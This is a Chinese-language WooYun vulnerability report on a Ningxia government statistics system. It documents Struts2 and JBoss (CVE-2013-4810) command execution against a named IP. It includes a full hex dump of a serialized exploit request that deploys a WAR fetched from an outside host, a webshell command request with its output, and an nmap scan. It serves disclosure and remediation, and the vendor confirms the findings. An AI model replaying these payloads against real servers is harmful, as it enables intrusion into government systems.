当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045661

漏洞标题:宁夏某政府网系统存在命令执行漏洞

相关厂商:宁夏某政府网

漏洞作者: 【|→上善若水】

提交时间:2013-12-11 19:05

修复时间:2014-01-25 19:05

公开时间:2014-01-25 19:05

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-11: 细节已通知厂商并且等待厂商处理中
2013-12-15: 厂商已经确认,细节仅向厂商公开
2013-12-25: 细节向核心白帽子及相关领域专家公开
2014-01-04: 细节向普通白帽子公开
2014-01-14: 细节向实习白帽子公开
2014-01-25: 细节向公众公开

简要描述:

宁夏统计局网上直报系统存在jboss和struts2漏洞,可直接添加管理员用户,3389远程登录。

详细说明:

http://222.75.160.184/login_loginSystem.do,通过工具检测存在strut2命令执行漏洞:

1.jpg


权限为管理员权限。

2.jpg


可直接添加账户,以下为添加的账户:

3.jpg


网站路径为:D:\jboss-4.2.3.GA\server\node3\.\tmp\deploy\tmp5705099123937687401ROOT-exp.war
使用CVE-2013-4810,验证该服务器也存在jboss漏洞。
root@pentest:~/Desktop# php Tomcat_JBoss.php 222.75.160.184 "net user"
0 : 50 4f 53 54 20 2f 69 6e 76 6f 6b 65 72 2f 45 4a [POST /invoker/EJ]
10 : 42 49 6e 76 6f 6b 65 72 53 65 72 76 6c 65 74 2f [BInvokerServlet/]
20 : 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 74 65 [ HTTP/1.1..Conte]
30 : 6e 74 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 [ntType: applicat]
40 : 69 6f 6e 2f 78 2d 6a 61 76 61 2d 73 65 72 69 61 [ion/x-java-seria]
50 : 6c 69 7a 65 64 2d 6f 62 6a 65 63 74 3b 20 63 6c [lized-object; cl]
60 : 61 73 73 3d 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e [ass=org.jboss.in]
70 : 76 6f 63 61 74 69 6f 6e 2e 4d 61 72 73 68 61 6c [vocation.Marshal]
80 : 6c 65 64 49 6e 76 6f 63 61 74 69 6f 6e 0d 0a 41 [ledInvocation..A]
90 : 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 [ccept-Encoding: ]
A0 : 78 2d 67 7a 69 70 2c 78 2d 64 65 66 6c 61 74 65 [x-gzip,x-deflate]
B0 : 2c 67 7a 69 70 2c 64 65 66 6c 61 74 65 0d 0a 55 [,gzip,deflate..U]
C0 : 73 65 72 2d 41 67 65 6e 74 3a 20 4a 61 76 61 2f [ser-Agent: Java/]
D0 : 31 2e 36 2e 30 5f 32 31 0d 0a 48 6f 73 74 3a 20 [1.6.0_21..Host: ]
E0 : 32 32 32 2e 37 35 2e 31 36 30 2e 31 38 34 3a 38 [222.75.160.184:8]
F0 : 30 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f [0..Accept: text/]
100 : 68 74 6d 6c 2c 20 69 6d 61 67 65 2f 67 69 66 2c [html, image/gif,]
110 : 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20 2a 3b 20 [ image/jpeg, *; ]
120 : 71 3d 2e 32 2c 20 2a 2f 2a 3b 20 71 3d 2e 32 0d [q=.2, */*; q=.2.]
130 : 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 [.Connection: kee]
140 : 70 2d 61 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 [p-alive..Content]
150 : 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 [-type: applicati]
160 : 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 [on/x-www-form-ur]
170 : 6c 65 6e 63 6f 64 65 64 0d 0a 43 6f 6e 74 65 6e [lencoded..Conten]
180 : 74 2d 4c 65 6e 67 74 68 3a 20 37 34 33 0d 0a 0d [t-Length: 743...]
190 : 0a ac ed 00 05 73 72 00 29 6f 72 67 2e 6a 62 6f [.....sr.)org.jbo]
1A0 : 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e 2e 4d 61 [ss.invocation.Ma]
1B0 : 72 73 68 61 6c 6c 65 64 49 6e 76 6f 63 61 74 69 [rshalledInvocati]
1C0 : 6f 6e f6 06 95 27 41 3e a4 be 0c 00 00 78 70 70 [on...'A>.....xpp]
1D0 : 77 08 78 94 98 47 c1 d0 53 87 73 72 00 11 6a 61 [w.x..G..S.sr..ja]
1E0 : 76 61 2e 6c 61 6e 67 2e 49 6e 74 65 67 65 72 12 [va.lang.Integer.]
1F0 : e2 a0 a4 f7 81 87 38 02 00 01 49 00 05 76 61 6c [......8...I..val]
200 : 75 65 78 72 00 10 6a 61 76 61 2e 6c 61 6e 67 2e [uexr..java.lang.]
210 : 4e 75 6d 62 65 72 86 ac 95 1d 0b 94 e0 8b 02 00 [Number..........]
220 : 00 78 70 26 95 be 0a 73 72 00 24 6f 72 67 2e 6a [.xp&...sr.$org.j]
230 : 62 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e 2e [boss.invocation.]
240 : 4d 61 72 73 68 61 6c 6c 65 64 56 61 6c 75 65 ea [MarshalledValue.]
250 : cc e0 d1 f4 4a d0 99 0c 00 00 78 70 77 fb 00 00 [....J.....xpw...]
260 : 00 f3 ac ed 00 05 75 72 00 13 5b 4c 6a 61 76 61 [......ur..[Ljava]
270 : 2e 6c 61 6e 67 2e 4f 62 6a 65 63 74 3b 90 ce 58 [.lang.Object;..X]
280 : 9f 10 73 29 6c 02 00 00 78 70 00 00 00 04 73 72 [..s)l...xp....sr]
290 : 00 1b 6a 61 76 61 78 2e 6d 61 6e 61 67 65 6d 65 [..javax.manageme]
2A0 : 6e 74 2e 4f 62 6a 65 63 74 4e 61 6d 65 0f 03 a7 [nt.ObjectName...]
2B0 : 1b eb 6d 15 cf 03 00 00 78 70 74 00 21 6a 62 6f [..m.....xpt.!jbo]
2C0 : 73 73 2e 73 79 73 74 65 6d 3a 73 65 72 76 69 63 [ss.system:servic]
2D0 : 65 3d 4d 61 69 6e 44 65 70 6c 6f 79 65 72 78 74 [e=MainDeployerxt]
2E0 : 00 06 64 65 70 6c 6f 79 75 71 00 7e 00 00 00 00 [..deployuq.~....]
2F0 : 00 01 74 00 25 68 74 74 70 3a 2f 2f 72 65 74 72 [..t.%http://retr]
300 : 6f 67 6f 64 2e 61 6c 74 65 72 76 69 73 74 61 2e [ogod.altervista.]
310 : 6f 72 67 2f 61 2e 77 61 72 3f 75 72 00 13 5b 4c [org/a.war?ur..[L]
320 : 6a 61 76 61 2e 6c 61 6e 67 2e 53 74 72 69 6e 67 [java.lang.String]
330 : 3b ad d2 56 e7 e9 1d 7b 47 02 00 00 78 70 00 00 [;..V...{G...xp..]
340 : 00 01 74 00 10 6a 61 76 61 2e 6c 61 6e 67 2e 53 [..t..java.lang.S]
350 : 74 72 69 6e 67 0d d3 be c9 78 77 04 00 00 00 01 [tring....xw.....]
360 : 73 72 00 22 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e [sr."org.jboss.in]
370 : 76 6f 63 61 74 69 6f 6e 2e 49 6e 76 6f 63 61 74 [vocation.Invocat]
380 : 69 6f 6e 4b 65 79 b8 fb 72 84 d7 93 85 f9 02 00 [ionKey..r.......]
390 : 01 49 00 07 6f 72 64 69 6e 61 6c 78 70 00 00 00 [.I..ordinalxp...]
3A0 : 05 73 71 00 7e 00 05 77 0d 00 00 00 05 ac ed 00 [.sq.~..w........]
3B0 : 05 70 fb 57 a7 aa 78 77 04 00 00 00 03 73 71 00 [.p.W..xw.....sq.]
3C0 : 7e 00 07 00 00 00 04 73 72 00 23 6f 72 67 2e 6a [~......sr.#org.j]
3D0 : 62 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e 2e [boss.invocation.]
3E0 : 49 6e 76 6f 63 61 74 69 6f 6e 54 79 70 65 59 a7 [InvocationTypeY.]
3F0 : 3a 1c a5 2b 7c bf 02 00 01 49 00 07 6f 72 64 69 [:..+|....I..ordi]
400 : 6e 61 6c 78 70 00 00 00 01 73 71 00 7e 00 07 00 [nalxp....sq.~...]
410 : 00 00 0a 70 74 00 0f 4a 4d 58 5f 4f 42 4a 45 43 [...pt..JMX_OBJEC]
420 : 54 5f 4e 41 4d 45 73 72 00 1b 6a 61 76 61 78 2e [T_NAMEsr..javax.]
430 : 6d 61 6e 61 67 65 6d 65 6e 74 2e 4f 62 6a 65 63 [management.Objec]
440 : 74 4e 61 6d 65 0f 03 a7 1b eb 6d 15 cf 03 00 00 [tName.....m.....]
450 : 78 70 74 00 21 6a 62 6f 73 73 2e 73 79 73 74 65 [xpt.!jboss.syste]
460 : 6d 3a 73 65 72 76 69 63 65 3d 4d 61 69 6e 44 65 [m:service=MainDe]
470 : 70 6c 6f 79 65 72 78 78 [ployerxx]
0 : 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d [HTTP/1.1 200 OK.]
10 : 0a 44 61 74 65 3a 20 57 65 64 2c 20 31 31 20 44 [.Date: Wed, 11 D]
20 : 65 63 20 32 30 31 33 20 31 30 3a 33 35 3a 32 36 [ec 2013 10:35:26]
30 : 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 [ GMT..Server: Ap]
40 : 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 57 69 6e [ache/2.2.15 (Win]
50 : 33 32 29 20 6d 6f 64 5f 6a 6b 2f 31 2e 32 2e 32 [32) mod_jk/1.2.2]
60 : 38 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a [8..X-Powered-By:]
70 : 20 53 65 72 76 6c 65 74 20 32 2e 34 3b 20 4a 42 [ Servlet 2.4; JB]
80 : 6f 73 73 2d 34 2e 32 2e 33 2e 47 41 20 28 62 75 [oss-4.2.3.GA (bu]
90 : 69 6c 64 3a 20 53 56 4e 54 61 67 3d 4a 42 6f 73 [ild: SVNTag=JBos]
A0 : 73 5f 34 5f 32 5f 33 5f 47 41 20 64 61 74 65 3d [s_4_2_3_GA date=]
B0 : 32 30 30 38 30 37 31 38 31 34 33 39 29 2f 4a 42 [200807181439)/JB]
C0 : 6f 73 73 57 65 62 2d 32 2e 30 0d 0a 43 6f 6e 6e [ossWeb-2.0..Conn]
D0 : 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 [ection: close..T]
E0 : 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 [ransfer-Encoding]
F0 : 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 [: chunked..Conte]
100 : 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 [nt-Type: applica]
110 : 74 69 6f 6e 2f 78 2d 6a 61 76 61 2d 73 65 72 69 [tion/x-java-seri]
120 : 61 6c 69 7a 65 64 2d 6f 62 6a 65 63 74 3b 20 63 [alized-object; c]
130 : 6c 61 73 73 3d 6f 72 67 2e 6a 62 6f 73 73 2e 69 [lass=org.jboss.i]
140 : 6e 76 6f 63 61 74 69 6f 6e 2e 4d 61 72 73 68 61 [nvocation.Marsha]
150 : 6c 6c 65 64 56 61 6c 75 65 0d 0a 0d 0a [lledValue....]
0 : 47 45 54 20 2f 61 2f 70 77 6e 2e 6a 73 70 3f 63 [GET /a/pwn.jsp?c]
10 : 6d 64 3d 6e 65 74 2b 75 73 65 72 20 48 54 54 50 [md=net+user HTTP]
20 : 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 32 32 32 2e [/1.0..Host: 222.]
30 : 37 35 2e 31 36 30 2e 31 38 34 3a 38 30 0d 0a 43 [75.160.184:80..C]
40 : 6f 6e 6e 65 63 74 69 6f 6e 3a 20 43 6c 6f 73 65 [onnection: Close]
50 : 0d 0a 0d 0a [....]
HTTP/1.1 200 OK
Date: Wed, 11 Dec 2013 10:35:32 GMT
Server: Apache/2.2.15 (Win32) mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: JSESSIONID=A54542CF3FE381A2E305CA4C537A095B.node1; Path=/
Content-Length: 214
Connection: close
Content-Type: text/html;charset=ISO-8859-1
\\LENOVO-2QNZ7QYP ���û��ʻ�
-------------------------------------------------------------------------------
Administrator Guest SUPPORT_388945a0
�����ɹ����ɡ�
通过nmap扫描,该服务器对外开放3389 端口:
root@pentest:~# nmap -sV 222.75.160.184
Starting Nmap 6.40 ( http://nmap.org ) at 2013-12-11 18:37 CST
Nmap scan report for 222.75.160.184
Host is up (0.14s latency).
Not shown: 956 closed ports
PORT STATE SERVICE VERSION
............................
3389/tcp open ms-wbt-server Microsoft Terminal Service
........................................................

4.jpg


5.jpg


漏洞证明:

同上

修复方案:

服务器只是做友情检测,未动任何东西,账户已删除。
升级相应中间件到最新版本。
降低相应中间件的运行权限。
检测服务器是否有隐藏账户。
检测服务器是否有webshell。
修改服务器密码。

版权声明:转载请注明来源 【|→上善若水】@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2013-12-15 21:39

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给宁夏分中心处置。按多个漏洞进行评分,rank 16

最新状态:

暂无


漏洞评价:

评论